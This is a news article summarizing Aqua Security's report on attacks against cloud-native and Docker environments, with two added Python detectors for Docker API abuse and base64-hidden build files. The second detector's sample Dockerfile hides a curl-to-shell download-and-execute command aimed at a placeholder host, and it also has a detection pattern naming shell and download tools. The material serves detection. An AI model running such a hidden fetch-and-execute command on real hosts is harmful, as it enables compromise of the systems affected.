For several months, cyberattacks have been growing in intensity and causing ever more damage. The latest trend highlighted in Aqua Security's study shows that attackers are also successfully targeting containerized and cloud-native environments.

Aqua Security, which specializes in security solutions for cloud, virtualized and containerized environments, analyzed data on 17,521 cyberattacks detected in the second half of 2020, up 26% from the previous half-year. Compiled in its latest Cloud Native Threat Report, the findings trace how cybercriminals' techniques are evolving. “They continue to look for other ways to attack cloud native environments,” says Aqua Security. “We have identified massive attacks targeting supply chains, auto-build code repositories, registries as well as providers of continuous integration services, which were not common vectors in the past.” Behind these campaigns, two objectives stand out: hijacking these environments for cryptomining (41%) or installing a backdoor (36%) to gain access to the victim's network and information system.

Attacks on containerized environments are carried out through images that embed obfuscation or malicious commands. In the second half of 2020, a compromise vector was observed in which the malicious image is built directly on the target host rather than pulled from a registry. “The attackers used a Docker SDK for Python package to send commands to an improperly configured Docker API. The attack sequence started by sending GET requests to explore the Docker server and POST requests to build and run a corrupted image on a target host,” Aqua Security explains. In the second half of 2020, 3.78 malicious images per day were used for compromise purposes, against 2.75 a year earlier, showing that attackers are diversifying their techniques. At the same time, the number of direct attacks has grown sharply, averaging over 97 per day compared with just 13 a year earlier.
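The sequence Aqua Security describes (GET requests to enumerate the daemon, then POST requests to build and start a container) leaves a recognisable trace in the Docker Engine API access log of an exposed host. The detector below is an added example written for this article, not code from Aqua Security or from its report. It assumes a simple log format of `timestamp source_ip method path status` (the format and all log lines are constructed for the example) and alerts on any source that issues at least two successful enumeration GETs before its first build, create or start POST.

```python
"""Flag the recon-then-build sequence against an exposed Docker Engine API.

Added example for illustration; the log format and sample lines are constructed,
not taken from a real daemon or from the Aqua Security report.
"""
import re
from collections import defaultdict

# Constructed sample access log (documentation addresses, not real traffic).
# 203.0.113.7 enumerates the daemon and then builds and starts a container;
# 10.0.0.5 is a legitimate operator only reading container state.
SAMPLE_LOG = """\
2020-12-01T10:02:11Z 203.0.113.7 GET /v1.40/version 200
2020-12-01T10:02:12Z 203.0.113.7 GET /v1.40/info 200
2020-12-01T10:02:13Z 203.0.113.7 GET /v1.40/containers/json?all=1 200
2020-12-01T10:02:20Z 203.0.113.7 POST /v1.40/build?t=update:latest 200
2020-12-01T10:02:31Z 203.0.113.7 POST /v1.40/containers/create?name=update 201
2020-12-01T10:02:32Z 203.0.113.7 POST /v1.40/containers/3f2a9c/start 204
2020-12-01T10:05:00Z 10.0.0.5 GET /v1.40/containers/json 200
2020-12-01T10:05:01Z 10.0.0.5 GET /v1.40/containers/3f2a9c/logs?stdout=1 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<ip>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<status>\d{3})$"
)
API_VERSION_RE = re.compile(r"^/v\d+\.\d+")

# Endpoints an attacker hits to learn what the daemon is and what it runs ...
RECON_ENDPOINTS = {"/version", "/info", "/containers/json", "/images/json"}
# ... and the endpoints that stage or create the malicious workload.
STAGING_ENDPOINTS = {"/build", "/images/create", "/containers/create"}


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # Drop the negotiated API version prefix and the query string so that
    # /v1.40/containers/json?all=1 and /containers/json compare equal.
    rec["endpoint"] = API_VERSION_RE.sub("", rec["path"]).split("?", 1)[0]
    rec["status"] = int(rec["status"])
    return rec


def is_container_start(endpoint):
    return re.match(r"^/containers/[^/]+/start$", endpoint) is not None


def find_build_after_recon(log_text, min_recon=2):
    """Return one alert per source IP that enumerated the daemon with at least
    `min_recon` distinct successful GETs and then staged or started a container."""
    recon_seen = defaultdict(set)
    alerted = set()
    alerts = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["status"] >= 400:  # ignore garbage and failed calls
            continue
        ip, endpoint = rec["ip"], rec["endpoint"]
        if rec["method"] == "GET" and endpoint in RECON_ENDPOINTS:
            recon_seen[ip].add(endpoint)
        elif rec["method"] == "POST" and (
            endpoint in STAGING_ENDPOINTS or is_container_start(endpoint)
        ):
            if len(recon_seen[ip]) >= min_recon and ip not in alerted:
                alerted.add(ip)
                alerts.append({
                    "ip": ip,
                    "ts": rec["ts"],
                    "recon": sorted(recon_seen[ip]),
                    "first_post": endpoint,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_build_after_recon(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} enumerated {alert['recon']} "
              f"then POST {alert['first_post']}")
```

The check keys on behaviour rather than on the source address, which matters given the report's finding below that most attacking IPs are absent from blocklists. Tune `min_recon` and the endpoint sets to your environment; an orchestrator that legitimately builds on the host will also match, so the alert is a starting point for triage, not a verdict.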

Malicious IP addresses not flagged by blocklists

“All of the IP addresses used in the attacks were linked to cloud and hosting services from vendors. Our honeypots recorded inbound traffic from Russia (17.3%) and the United States (15.9%). Surprisingly, only 13.43% of IP addresses are marked as malicious in blocklists. This means that network detection and prevention systems that rely on popular blocklists will generally be ineffective at detecting and preventing such communications,” the report adds. On average, attackers take five hours to scan a honeypot; the fastest need only a few minutes and the slowest up to 24 hours, with a median discovery time of about one hour.

In its report, Aqua Security also mapped the characteristics of attacks on containers to the MITRE ATT&CK framework, the standard reference in cybersecurity. Several observations follow: attackers continue to use worms to discover and infect vulnerable hosts, and they download malicious files at container runtime to infect websites with malicious code. Most attacks exploit a misconfigured Docker API port exposed to the internet that accepts inbound web traffic. “On top of the usual vector of attacks against misconfigured APIs, we’ve also seen build files on a host written in base64,” Aqua Security continues.
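Base64-encoded build files are meant to slip past a quick visual review or a keyword grep of the host. The scanner below is an added example, not code from Aqua Security or the report. It handles two constructed cases: a Dockerfile that is itself dropped on the host as one base64 blob, and a Dockerfile whose RUN, CMD or ENTRYPOINT line hides a command behind `echo <base64> | base64 -d | sh`. The sample Dockerfile, the encoded command and the host `example.net` are all constructed for the example.

```python
"""Surface base64-encoded content in Docker build files.

Added example for illustration; the sample Dockerfile and the hidden command
are constructed and do not come from the Aqua Security report.
"""
import base64
import binascii
import re
import string

# Constructed sample: an innocuous-looking image whose RUN line hides a
# download-and-execute command behind base64 (example.net is a placeholder).
HIDDEN_CMD = b"curl -s http://example.net/setup.sh | sh"
SAMPLE_DOCKERFILE = (
    "FROM alpine:3.12\n"
    "RUN apk add --no-cache curl\n"
    "RUN echo " + base64.b64encode(HIDDEN_CMD).decode() + " | base64 -d | sh\n"
    'CMD ["sleep", "infinity"]\n'
)
# The same build file as it might be written to the host: one base64 blob.
SAMPLE_ENCODED_FILE = base64.b64encode(SAMPLE_DOCKERFILE.encode()).decode()

# A run of 20+ base64 characters with optional padding, not glued to other
# base64 characters on either side (short tokens like "--no-cache" never match).
B64_TOKEN_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{20,}={0,2}(?![A-Za-z0-9+/=])")
# Decoded text worth escalating: downloaders, shells, piping into a shell.
SUSPICIOUS_RE = re.compile(r"\b(curl|wget|nc|bash|sh)\b|\|\s*(sh|bash)\b|chmod\s+\+x")


def try_decode(token):
    """Strict base64 decode; return the text only if it is printable UTF-8."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not text or any(c not in string.printable for c in text):
        return None
    return text


def unwrap_build_file(content):
    """If the whole file is a single base64 blob that decodes to a Dockerfile,
    return (decoded_text, True); otherwise return (content, False)."""
    blob = "".join(content.split())
    if B64_TOKEN_RE.fullmatch(blob):
        decoded = try_decode(blob)
        if decoded and re.search(r"^\s*FROM\s", decoded, re.M):
            return decoded, True
    return content, False


def find_encoded_commands(content):
    """Decode base64 tokens found in RUN/CMD/ENTRYPOINT lines and report them."""
    dockerfile, _ = unwrap_build_file(content)
    findings = []
    for lineno, line in enumerate(dockerfile.splitlines(), 1):
        instruction = line.strip().split(" ", 1)[0].upper()
        if instruction not in {"RUN", "CMD", "ENTRYPOINT"}:
            continue
        for m in B64_TOKEN_RE.finditer(line):
            decoded = try_decode(m.group(0))
            if decoded is None:
                continue
            findings.append({
                "line": lineno,
                "decoded": decoded,
                "suspicious": SUSPICIOUS_RE.search(decoded) is not None,
            })
    return findings


if __name__ == "__main__":
    for f in find_encoded_commands(SAMPLE_ENCODED_FILE):
        flag = "SUSPICIOUS" if f["suspicious"] else "info"
        print(f"line {f['line']} [{flag}]: {f['decoded']}")
```

Run over every file an exposed daemon has written (the `docker build` context directory, `/tmp`, and wherever `POST /build` payloads land on your hosts); an unexpected build file that only becomes readable after decoding is itself the finding, whatever the decoded command turns out to be.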